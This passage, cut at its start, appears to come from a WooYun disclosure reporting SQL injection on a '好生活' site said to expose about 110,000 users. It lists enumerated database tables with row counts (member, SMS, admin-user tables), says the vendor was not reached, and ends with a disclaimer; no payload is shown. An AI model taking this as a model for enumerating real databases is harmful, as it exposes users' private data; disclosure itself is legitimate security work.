 | QUESTIONNAIRE_ANSWERS          | 122     |
 | PX_HARDWARE                    | 107     |
 | T_MEMBERCARDINFO_BAK           | 91      |
 | Z_BK_T_JS_OBJECTION_DTL_2015   | 84      |
 | T_JKCF_COOKERKNOW              | 77      |
 | T_XT_GROUP                     | 74      |
 | FRIEND_PHOTOALBUMMASTER        | 70      |
 | SMS_TEMPLATE                   | 70      |
 | FRIEND_PHOTOALBUMDTL           | 69      |
 | Z_BK_T_JS_OBJECTION_2014       | 69      |
 | T_JS_COSTINGCODE               | 66      |
 | Z_BK_T_JS_COSTINGCODE_2014     | 66      |
 | Z_BK_T_JS_COSTINGCODE_2015     | 66      |
 | TEMPDATAVALIDATION             | 64      |
 | T_SMS_BATCHORGANIZATION        | 55      |
 | T_JS_MECHANISMTABLE            | 51      |
 | T_XLZX_TALK_DTL                | 48      |
 | REGISTRATIONDETAIL             | 46      |
 | FL_QY_CORPWELFARE              | 44      |
 | PX_HARDWAREMOD                 | 44      |
 | TRAINNOTICE_BAK                | 44      |
 | PX_SURVEY_TITLE                | 40      |
 | QUESTIONNAIRE_SUBJECT          | 36      |
 | Z_BK_T_JS_MECHANISMTABLE_2015  | 36      |
 | T_ALPHAINFO                    | 33      |
 | SYN_TASK_MONTH                 | 32      |
 | T_FIELD                        | 30      |
 | T_XT_SMSTEMPLATE               | 29      |
 | PX_DTL                         | 28      |
 | T_XL_EVALUATE                  | 28      |
 | T_XT_USERINROLE                | 28      |
 | Z_BK_T_JS_OBJECTION_DTL_2014   | 28      |
 | PLAY_PLACE                     | 27      |
 | T_SECKILL_ITEM                 | 27      |
 | DATATREE                       | 26      |
 | ITEMCLASSIFICATION             | 24      |
 | T_HPP_BOOKS                    | 24      |
 | Z_BK_ITEMCLASSIFICATION_2014   | 24      |
 | Z_BK_ITEMCLASSIFICATION_2015   | 24      |
 | Z_BK_T_JS_MECHANISMTABLE_2014  | 24      |
 | FL_SH_WELFAREINFO              | 23      |
 | T_HPP_WEEKEND_TJ               | 23      |
 | USER_XINHUAESTORE              | 23      |
 | T_XL_COUNSELING                | 22      |
 | COMMUNITY_TYPE                 | 21      |
 | RESERVATION                    | 21      |
 | T_ORGINFO                      | 21      |
 | BNA_USER_LOAD                  | 20      |
 | HC_FIRSTVIEWSETTING            | 20      |
 | ROLES                          | 20      |
 | FL_SH_MERCHANTINFO             | 19      |
 | MOBILE_VERSION                 | 19      |
 | T_JS_L2ORDER                   | 16      |
 | SERVICE_CERT                   | 15      |
 | FL_YG_ACCOUNT                  | 14      |
 | T_XT_APPENDPARAMETER           | 12      |
 | PX_HITEGG_SURVEY_AW_WIN        | 11      |
 | PX_MST                         | 11      |
 | T_ITEMPRICE                    | 11      |
 | COMMUNITY_HOME                 | 10      |
 | FL_YG_CONSUMPTIONDETAIL        | 10      |
 | PX_EMP                         | 10      |
 | SKL_REPORT                     | 10      |
 | T_STADIUM                      | 10      |
 | T_XLZX_TALK                    | 10      |
 | HC_CLIENTSETTING               | 9       |
 | T_ITEM                         | 9       |
 | T_STADIUMHIERARCHY             | 9       |
 | PLAY_NOTICE                    | 8       |
 | T_ADMINUSER                    | 8       |
 | T_GIVEMONEYINFO                | 8       |
 | TEAM_ACTIVITIES                | 8       |
 | COMMUNITY_INDEX                | 7       |
 | FL_QY_WELFARETYPEMAX           | 7       |
 | H_LIST_MODULE                  | 7       |
 | DOWNLOADRECORD                 | 5       |
 | EXCEPTION_PROCESSING           | 5       |
 | FRIEND_GROUPS                  | 5       |
 | ITEM_TEMP_YN                   | 5       |
 | PX_HITEGG_SURVEY_AW            | 5       |
 | T_JS_OPERATINGCONFIG_USER      | 5       |
 | T_XT_CATEGORY                  | 5       |
 | T_XT_ROLE                      | 5       |
 | VENUE_PLACE                    | 5       |
 | REGISTRATIONINFORMATION        | 4       |
 | T_HJ_ZF                        | 4       |
 | T_MEMBERINFO                   | 4       |
 | T_MEMBERTYPE                   | 4       |
 | T_SENDADMINSMS                 | 4       |
 | FL_SH_FORECLOSURE              | 3       |
 | QUESTIONNAIRE_BATCH            | 3       |
 | SMS_BATCH                      | 3       |
 | HC_BASEDTL                     | 2       |
 | HC_BASEMST                     | 2       |
 | ORDERSETTING                   | 2       |
 | PX_SURVEY                      | 2       |
 | T_XT_PROVIDERACCOUNT           | 2       |
 | KNOWLEDGECATAGRY               | 1       |
 | PX_COOPERATION                 | 1       |
 | PX_HITEGG_SURVEY               | 1       |
 | T_HJ_NAME                      | 1       |
 | T_TXFL_OPENDATE                | 1       |
 | T_XT_ORGACCOUNTRELEVANCE       | 1       |
 | T_XT_PROVIDER                  | 1       |
 +--------------------------------+---------+

泄露用户信息

好生活某站存在注入泄露大量信息(11w用户)

修复方案:

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝

漏洞Rank:15 (WooYun评价)

漏洞评价:

对本漏洞信息进行评价,以更好的反馈信息的价值,包括信息客观性,内容是否完整以及是否具备学习价值

漏洞评价(共0人评价):

登陆后才能进行评分

评价

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin